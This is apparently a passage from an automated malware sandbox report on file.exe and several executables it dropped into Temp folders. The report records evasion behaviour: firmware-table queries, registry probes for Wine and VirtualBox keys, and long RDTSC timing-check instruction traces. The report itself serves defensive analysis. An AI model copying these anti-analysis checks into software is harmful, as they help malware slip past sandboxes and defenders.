Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE197 second address: 5FE1BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F45A8838C84h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F45A8838C7Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE1BB second address: 5FE1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45A84F3301h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE1DF second address: 5FE1FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F45A8838C84h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE38B second address: 5FE390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE390 second address: 5FE396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE5E2 second address: 5FE5E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE5E8 second address: 5FE5EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE5EF second address: 5FE5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FE757 second address: 5FE75D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600996 second address: 6009D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007F45A84F32F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F45A84F32F8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2CA4h], eax 0x00000031 push 00000000h 0x00000033 call 00007F45A84F32F9h 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6009D9 second address: 6009FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C7Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45A8838C7Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6009FD second address: 600A02 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600A02 second address: 600A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jne 00007F45A8838C78h 0x00000012 pushad 0x00000013 jmp 00007F45A8838C7Dh 0x00000018 jg 00007F45A8838C76h 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jl 00007F45A8838C88h 0x00000028 jmp 00007F45A8838C82h 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600A4F second address: 600A5C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F45A84F32F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600A5C second address: 600A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D2D1Bh], eax 0x0000000d push edx 0x0000000e mov edx, dword ptr [ebp+122D2A2Ch] 0x00000014 pop edi 0x00000015 push 00000003h 0x00000017 and edi, dword ptr [ebp+122D2B68h] 0x0000001d push 00000000h 0x0000001f add dword ptr [ebp+122D2CA4h], edx 0x00000025 push 00000003h 0x00000027 mov edi, dword ptr [ebp+122D2974h] 0x0000002d push A69DE0E0h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 pop eax 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600A96 second address: 600AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 669DE0E0h 0x00000010 lea ebx, dword ptr [ebp+124558A9h] 0x00000016 jns 00007F45A84F32FFh 0x0000001c pushad 0x0000001d clc 0x0000001e xor dword ptr [ebp+122D17E2h], ebx 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 js 00007F45A84F32F6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600AD0 second address: 600AF0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F45A8838C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45A8838C84h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600B88 second address: 600B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600B8C second address: 600C1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a xor dword ptr [esp], 1C08B0CFh 0x00000011 mov dword ptr [ebp+122D197Bh], ebx 0x00000017 push 00000003h 0x00000019 mov ecx, dword ptr [ebp+122D2914h] 0x0000001f push 00000000h 0x00000021 sub dword ptr [ebp+122D18F0h], eax 0x00000027 push 00000003h 0x00000029 xor edi, dword ptr [ebp+122D289Ch] 0x0000002f or dword ptr [ebp+122D17E2h], edi 0x00000035 push CC5B2161h 0x0000003a pushad 0x0000003b push ebx 0x0000003c jmp 00007F45A8838C7Dh 0x00000041 pop ebx 0x00000042 push ecx 0x00000043 pushad 0x00000044 popad 0x00000045 pop ecx 0x00000046 popad 0x00000047 xor dword ptr [esp], 0C5B2161h 0x0000004e jne 00007F45A8838C7Ch 0x00000054 lea ebx, dword ptr [ebp+124558B2h] 0x0000005a call 00007F45A8838C7Ah 0x0000005f mov dword ptr [ebp+122D17C1h], eax 0x00000065 pop esi 0x00000066 mov edi, dword ptr [ebp+122D2B5Ch] 0x0000006c xchg eax, ebx 0x0000006d jc 00007F45A8838C7Eh 0x00000073 push esi 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600D84 second address: 600D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F45A84F32F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600D8F second address: 600E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 19CD785Bh 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F45A8838C78h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1CEBh], esi 0x0000002e stc 0x0000002f mov edi, dword ptr [ebp+122D2BD0h] 0x00000035 lea ebx, dword ptr [ebp+124558BDh] 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007F45A8838C78h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 sub esi, dword ptr [ebp+122D2970h] 0x0000005b mov esi, dword ptr [ebp+122D2928h] 0x00000061 xchg eax, ebx 0x00000062 jns 00007F45A8838C8Ch 0x00000068 push eax 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600E24 second address: 600E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 613477 second address: 61347B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61347B second address: 613481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623005 second address: 623023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C82h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F45A8838C76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623023 second address: 623027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623027 second address: 623045 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F45A8838C96h 0x0000000e jmp 00007F45A8838C7Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623045 second address: 623049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620D5C second address: 620D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620D60 second address: 620D6E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45A84F32F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620D6E second address: 620D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620D7D second address: 620D99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F45A84F3306h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620D99 second address: 620DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F45A8838C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620DA3 second address: 620DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F45A84F330Fh 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 pushad 0x00000016 jmp 00007F45A84F32FDh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6211F8 second address: 62121B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F45A8838C89h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62121B second address: 621233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A84F3303h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621521 second address: 621544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F45A8838C76h 0x0000000a jmp 00007F45A8838C83h 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621544 second address: 621565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F45A84F3309h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621565 second address: 62156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621679 second address: 62167F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9B18 second address: 5E9B34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F45A8838C86h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F45A8838C7Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6226D5 second address: 6226DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6226DB second address: 622707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45A8838C7Fh 0x0000000c jmp 00007F45A8838C86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622707 second address: 62270B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62270B second address: 622713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622853 second address: 622897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A84F3304h 0x00000009 pushad 0x0000000a jmp 00007F45A84F3300h 0x0000000f jmp 00007F45A84F3307h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622A16 second address: 622A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622B95 second address: 622B9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622B9B second address: 622BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F45A8838C76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622E5D second address: 622E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622E61 second address: 622E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62600A second address: 626014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F45A84F32F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6265C6 second address: 626613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F45A8838C76h 0x00000009 jo 00007F45A8838C76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push ecx 0x00000014 ja 00007F45A8838C7Ch 0x0000001a jl 00007F45A8838C76h 0x00000020 pop ecx 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 jmp 00007F45A8838C7Bh 0x0000002a mov eax, dword ptr [eax] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F45A8838C81h 0x00000034 jno 00007F45A8838C76h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 629E01 second address: 629E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F45A84F32F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 629E0B second address: 629E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 629E11 second address: 629E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E842 second address: 62E846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EAF6 second address: 62EB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45A84F32F6h 0x0000000a jmp 00007F45A84F3300h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EB11 second address: 62EB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EB18 second address: 62EB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F45A84F32F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EB27 second address: 62EB39 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F45A8838C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EB39 second address: 62EB49 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F45A84F32F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EC7E second address: 62EC84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631130 second address: 631136 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631136 second address: 631154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F45A8838C82h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631222 second address: 63123C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F45A84F32FEh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63123C second address: 631243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631243 second address: 631248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631459 second address: 63145D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631546 second address: 63154A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
